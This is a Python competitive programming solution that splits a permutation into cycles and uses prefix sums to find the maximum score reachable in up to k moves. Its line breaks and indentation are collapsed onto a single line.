import sys sys.setrecursionlimit(10**7) readline = sys.stdin.buffer.readline def readstr():return readline().rstrip().decode() def readstrs():return list(readline().decode().split()) def readint():return int(readline()) def readints():return list(map(int,readline().split())) def printrows(x):print('\n'.join(map(str,x))) def printline(x):print(' '.join(map(str,x))) def check(cir,num): m = len(cir) a = sum(cir) if num == 0: ss = 0 elif num == 1: ss = max(cir) else: ac = list(accumulate([0]+cir)) l = 0 r = 1 ss = ac[r]-ac[l] i = 0 while 1: if r == m: l = ac[l+1:r].index(min(ac[l+1:r])) + l+1 ss = max(ss,ac[r]-ac[l]) break elif i%2==0: r = ac[r+1:l+num+1].index(max(ac[r+1:l+num+1])) + r+1 else: l = ac[l+1:r].index(min(ac[l+1:r])) + l+1 i+=1 ss = max(ss,ac[r]-ac[l]) num = m-num l = 0 r = num i = 0 ss = max(ss,a-ac[r]+ac[l]) while 1: if r == m: l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1 ss = max(ss,a-ac[r]+ac[l]) break elif i%2==0: r = ac[r+1:l+m].index(min(ac[r+1:l+m])) + r+1 else: l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1 i+=1 ss = max(ss,a-ac[r]+ac[l]) return ss from itertools import accumulate n,k = readints() p = [x-1 for x in readints()] c = readints() circles = [] used = [0]*n for i in range(n): if not used[i]: circles.append([c[i]]) used[i] = 1 j = p[i] while not used[j]: circles[-1].append(c[j]) used[j] = 1 j = p[j] score = -10**20 for cir in circles: m = len(cir) a = sum(cir) if k>m: if a>0: score = max(score, (k//m)*a + check(cir,k%m), (k//m-1)*a + check(cir,m)) else: score = max(score,check(cir,m)) else: score = max(score,check(cir,k)) print(score)